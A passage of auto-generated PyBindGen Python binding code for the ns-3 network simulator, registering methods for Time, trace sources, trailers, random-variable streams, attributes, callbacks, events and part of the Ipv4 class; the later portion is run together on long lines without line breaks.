    cls.add_method('FromInteger', 'ns3::Time', [param('uint64_t', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True)
    # Per-unit getters.
    cls.add_method('GetDays', 'double', [], is_const=True)
    cls.add_method('GetDouble', 'double', [], is_const=True)
    cls.add_method('GetFemtoSeconds', 'int64_t', [], is_const=True)
    cls.add_method('GetHours', 'double', [], is_const=True)
    cls.add_method('GetInteger', 'int64_t', [], is_const=True)
    cls.add_method('GetMicroSeconds', 'int64_t', [], is_const=True)
    cls.add_method('GetMilliSeconds', 'int64_t', [], is_const=True)
    cls.add_method('GetMinutes', 'double', [], is_const=True)
    cls.add_method('GetNanoSeconds', 'int64_t', [], is_const=True)
    cls.add_method('GetPicoSeconds', 'int64_t', [], is_const=True)
    cls.add_method('GetResolution', 'ns3::Time::Unit', [], is_static=True)
    cls.add_method('GetSeconds', 'double', [], is_const=True)
    cls.add_method('GetTimeStep', 'int64_t', [], is_const=True)
    cls.add_method('GetYears', 'double', [], is_const=True)
    # Sign/zero predicates.
    cls.add_method('IsNegative', 'bool', [], is_const=True)
    cls.add_method('IsPositive', 'bool', [], is_const=True)
    cls.add_method('IsStrictlyNegative', 'bool', [], is_const=True)
    cls.add_method('IsStrictlyPositive', 'bool', [], is_const=True)
    cls.add_method('IsZero', 'bool', [], is_const=True)
    cls.add_method('Max', 'ns3::Time', [], is_static=True)
    cls.add_method('Min', 'ns3::Time', [], is_static=True)
    cls.add_method('SetResolution', 'void', [param('ns3::Time::Unit', 'resolution')], is_static=True)
    cls.add_method('StaticInit', 'bool', [], is_static=True)
    cls.add_method('To', 'ns3::int64x64_t', [param('ns3::Time::Unit', 'unit')], is_const=True)
    cls.add_method('ToDouble', 'double', [param('ns3::Time::Unit', 'unit')], is_const=True)
    cls.add_method('ToInteger', 'int64_t', [param('ns3::Time::Unit', 'unit')], is_const=True)
    return

def register_Ns3TraceSourceAccessor_methods(root_module, cls):
    """Register the ns3::TraceSourceAccessor bindings (trace-source-accessor.h, module 'core').

    Generated PyBindGen registration for the abstract trace-source connect/disconnect API.
    """
    cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
    cls.add_constructor([])
    # All four accessors are pure-virtual const methods; ObjectBase* is borrowed
    # (transfer_ownership=False), not owned by the wrapper.
    cls.add_method('Connect', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('ConnectWithoutContext', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Disconnect', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True)
    # NOTE: this function continues on the next chunk line (DisconnectWithoutContext, return).
    # --- continuation of register_Ns3TraceSourceAccessor_methods (started on the previous chunk line) ---
    cls.add_method('DisconnectWithoutContext', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True)
    return

def register_Ns3Trailer_methods(root_module, cls):
    """Register the ns3::Trailer bindings (trailer.h, module 'network').

    Generated PyBindGen registration for the abstract packet-trailer base class.
    """
    cls.add_output_stream_operator()
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
    # Trailers deserialize from the END iterator of the buffer.
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'end')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_pure_virtual=True, is_const=True, is_virtual=True)
    return

def register_Ns3TriangularRandomVariable_methods(root_module, cls):
    """Register the ns3::TriangularRandomVariable bindings (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Attribute getters for the configured distribution parameters.
    cls.add_method('GetMean', 'double', [], is_const=True)
    cls.add_method('GetMin', 'double', [], is_const=True)
    cls.add_method('GetMax', 'double', [], is_const=True)
    # Parameterized draws, then the virtual no-argument overrides.
    cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'min'), param('double', 'max')])
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'min'), param('uint32_t', 'max')])
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3UniformRandomVariable_methods(root_module, cls):
    """Register the ns3::UniformRandomVariable bindings (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    cls.add_method('GetMin', 'double', [], is_const=True)
    cls.add_method('GetMax', 'double', [], is_const=True)
    cls.add_method('GetValue', 'double', [param('double', 'min'), param('double', 'max')])
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'min'), param('uint32_t', 'max')])
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3WeibullRandomVariable_methods(root_module, cls):
    """Register the ns3::WeibullRandomVariable bindings (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    cls.add_method('GetScale', 'double', [], is_const=True)
    cls.add_method('GetShape', 'double', [], is_const=True)
    cls.add_method('GetBound', 'double', [], is_const=True)
    cls.add_method('GetValue', 'double', [param('double', 'scale'), param('double', 'shape'), param('double', 'bound')])
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'scale'), param('uint32_t', 'shape'), param('uint32_t', 'bound')])
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3ZetaRandomVariable_methods(root_module, cls):
    """Register the ns3::ZetaRandomVariable bindings (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    cls.add_method('GetAlpha', 'double', [], is_const=True)
    cls.add_method('GetValue', 'double', [param('double', 'alpha')])
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'alpha')])
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    # NOTE: this function continues past this chunk (no-argument GetInteger override, return).
random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ZipfRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZipfRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable::ZipfRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetAlpha() const [member function] cls.add_method('GetAlpha', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue(uint32_t n, double alpha) [member function] cls.add_method('GetValue', 'double', [param('uint32_t', 'n'), param('double', 'alpha')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger(uint32_t n, uint32_t alpha) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'n'), param('uint32_t', 'alpha')]) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3AttributeAccessor_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')]) ## attribute.h (module 'core'): 
ns3::AttributeAccessor::AttributeAccessor() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function] cls.add_method('Get', 'bool', [param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function] cls.add_method('HasGetter', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function] cls.add_method('HasSetter', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function] cls.add_method('Set', 'bool', [param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3AttributeChecker_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function] cls.add_method('Check', 'bool', [param('ns3::AttributeValue const &', 'value')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function] cls.add_method('Copy', 'bool', [param('ns3::AttributeValue 
const &', 'source'), param('ns3::AttributeValue &', 'destination')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::AttributeValue >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function] cls.add_method('CreateValidValue', 'ns3::Ptr< ns3::AttributeValue >', [param('ns3::AttributeValue const &', 'value')], is_const=True) ## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function] cls.add_method('GetUnderlyingTypeInformation', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function] cls.add_method('GetValueTypeName', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function] cls.add_method('HasUnderlyingTypeInformation', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3AttributeValue_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool 
ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_pure_virtual=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3CallbackChecker_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')]) return def register_Ns3CallbackImplBase_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')]) ## callback.h (module 'core'): std::string ns3::CallbackImplBase::GetTypeid() const [member function] cls.add_method('GetTypeid', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')], is_pure_virtual=True, is_const=True, is_virtual=True) ## callback.h (module 'core'): static std::string ns3::CallbackImplBase::Demangle(std::string const & mangled) [member function] 
cls.add_method('Demangle', 'std::string', [param('std::string const &', 'mangled')], is_static=True, visibility='protected') return def register_Ns3CallbackValue_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')]) ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor] cls.add_constructor([param('ns3::CallbackBase const &', 'base')]) ## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function] cls.add_method('Set', 'void', [param('ns3::CallbackBase', 'base')]) return def register_Ns3ConstantRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ConstantRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): 
ns3::ConstantRandomVariable::ConstantRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetConstant() const [member function] cls.add_method('GetConstant', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue(double constant) [member function] cls.add_method('GetValue', 'double', [param('double', 'constant')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger(uint32_t constant) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'constant')]) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3DeterministicRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::DeterministicRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable::DeterministicRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::DeterministicRandomVariable::SetValueArray(double * values, uint64_t length) [member function] cls.add_method('SetValueArray', 'void', [param('double *', 'values'), param('uint64_t', 'length')]) ## random-variable-stream.h (module 'core'): double ns3::DeterministicRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::DeterministicRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 
'uint32_t', [], is_virtual=True) return def register_Ns3EmpiricalRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable::EmpiricalRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::CDF(double v, double c) [member function] cls.add_method('CDF', 'void', [param('double', 'v'), param('double', 'c')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::EmpiricalRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::EmpiricalRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::Interpolate(double c1, double c2, double v1, double v2, double r) [member function] cls.add_method('Interpolate', 'double', [param('double', 'c1'), param('double', 'c2'), param('double', 'v1'), param('double', 'v2'), param('double', 'r')], visibility='private', is_virtual=True) ## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::Validate() [member function] cls.add_method('Validate', 'void', [], visibility='private', is_virtual=True) return def register_Ns3EmptyAttributeAccessor_methods(root_module, cls): ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor::EmptyAttributeAccessor(ns3::EmptyAttributeAccessor const & arg0) [copy constructor] cls.add_constructor([param('ns3::EmptyAttributeAccessor const &', 'arg0')]) ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor::EmptyAttributeAccessor() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool 
ns3::EmptyAttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function] cls.add_method('Get', 'bool', [param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::HasGetter() const [member function] cls.add_method('HasGetter', 'bool', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::HasSetter() const [member function] cls.add_method('HasSetter', 'bool', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function] cls.add_method('Set', 'bool', [param('ns3::ObjectBase *', 'object'), param('ns3::AttributeValue const &', 'value')], is_const=True, is_virtual=True) return def register_Ns3EmptyAttributeChecker_methods(root_module, cls): ## attribute.h (module 'core'): ns3::EmptyAttributeChecker::EmptyAttributeChecker(ns3::EmptyAttributeChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::EmptyAttributeChecker const &', 'arg0')]) ## attribute.h (module 'core'): ns3::EmptyAttributeChecker::EmptyAttributeChecker() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::Check(ns3::AttributeValue const & value) const [member function] cls.add_method('Check', 'bool', [param('ns3::AttributeValue const &', 'value')], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function] cls.add_method('Copy', 'bool', [param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')], is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> 
ns3::EmptyAttributeChecker::Create() const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::EmptyAttributeChecker::GetUnderlyingTypeInformation() const [member function] cls.add_method('GetUnderlyingTypeInformation', 'std::string', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::EmptyAttributeChecker::GetValueTypeName() const [member function] cls.add_method('GetValueTypeName', 'std::string', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::HasUnderlyingTypeInformation() const [member function] cls.add_method('HasUnderlyingTypeInformation', 'bool', [], is_const=True, is_virtual=True) return def register_Ns3EmptyAttributeValue_methods(root_module, cls): ## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')]) ## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, visibility='private', is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], visibility='private', is_virtual=True) ## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', 
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, visibility='private', is_virtual=True) return def register_Ns3ErlangRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ErlangRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable::ErlangRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetK() const [member function] cls.add_method('GetK', 'uint32_t', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetLambda() const [member function] cls.add_method('GetLambda', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue(uint32_t k, double lambda) [member function] cls.add_method('GetValue', 'double', [param('uint32_t', 'k'), param('double', 'lambda')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger(uint32_t k, uint32_t lambda) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'k'), param('uint32_t', 'lambda')]) ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3EventImpl_methods(root_module, cls): ## event-impl.h (module 'core'): ns3::EventImpl::EventImpl(ns3::EventImpl const & arg0) [copy constructor] cls.add_constructor([param('ns3::EventImpl const &', 'arg0')]) ## event-impl.h (module 'core'): ns3::EventImpl::EventImpl() [constructor] cls.add_constructor([]) ## event-impl.h (module 
'core'): void ns3::EventImpl::Cancel() [member function] cls.add_method('Cancel', 'void', []) ## event-impl.h (module 'core'): void ns3::EventImpl::Invoke() [member function] cls.add_method('Invoke', 'void', []) ## event-impl.h (module 'core'): bool ns3::EventImpl::IsCancelled() [member function] cls.add_method('IsCancelled', 'bool', []) ## event-impl.h (module 'core'): void ns3::EventImpl::Notify() [member function] cls.add_method('Notify', 'void', [], is_pure_virtual=True, visibility='protected', is_virtual=True) return def register_Ns3ExponentialRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ExponentialRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable::ExponentialRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue(double mean, double bound) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'bound')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger(uint32_t mean, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t 
ns3::ExponentialRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3GammaRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::GammaRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable::GammaRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetAlpha() const [member function] cls.add_method('GetAlpha', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetBeta() const [member function] cls.add_method('GetBeta', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue(double alpha, double beta) [member function] cls.add_method('GetValue', 'double', [param('double', 'alpha'), param('double', 'beta')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger(uint32_t alpha, uint32_t beta) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'alpha'), param('uint32_t', 'beta')]) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3Ipv4_methods(root_module, cls): ## ipv4.h (module 'internet'): ns3::Ipv4::Ipv4(ns3::Ipv4 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4 const &', 'arg0')]) ## ipv4.h (module 'internet'): ns3::Ipv4::Ipv4() [constructor] cls.add_constructor([]) ## ipv4.h (module 'internet'): bool ns3::Ipv4::AddAddress(uint32_t 
interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('AddAddress', 'bool', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::AddInterface(ns3::Ptr<ns3::NetDevice> device) [member function] cls.add_method('AddInterface', 'uint32_t', [param('ns3::Ptr< ns3::NetDevice >', 'device')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ptr<ns3::Socket> ns3::Ipv4::CreateRawSocket() [member function] cls.add_method('CreateRawSocket', 'ns3::Ptr< ns3::Socket >', [], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::DeleteRawSocket(ns3::Ptr<ns3::Socket> socket) [member function] cls.add_method('DeleteRawSocket', 'void', [param('ns3::Ptr< ns3::Socket >', 'socket')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4::GetAddress(uint32_t interface, uint32_t addressIndex) const [member function] cls.add_method('GetAddress', 'ns3::Ipv4InterfaceAddress', [param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForAddress(ns3::Ipv4Address address) const [member function] cls.add_method('GetInterfaceForAddress', 'int32_t', [param('ns3::Ipv4Address', 'address')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForDevice(ns3::Ptr<const ns3::NetDevice> device) const [member function] cls.add_method('GetInterfaceForDevice', 'int32_t', [param('ns3::Ptr< ns3::NetDevice const >', 'device')], is_pure_virtual=True, is_const=True, is_virtual=True) ## 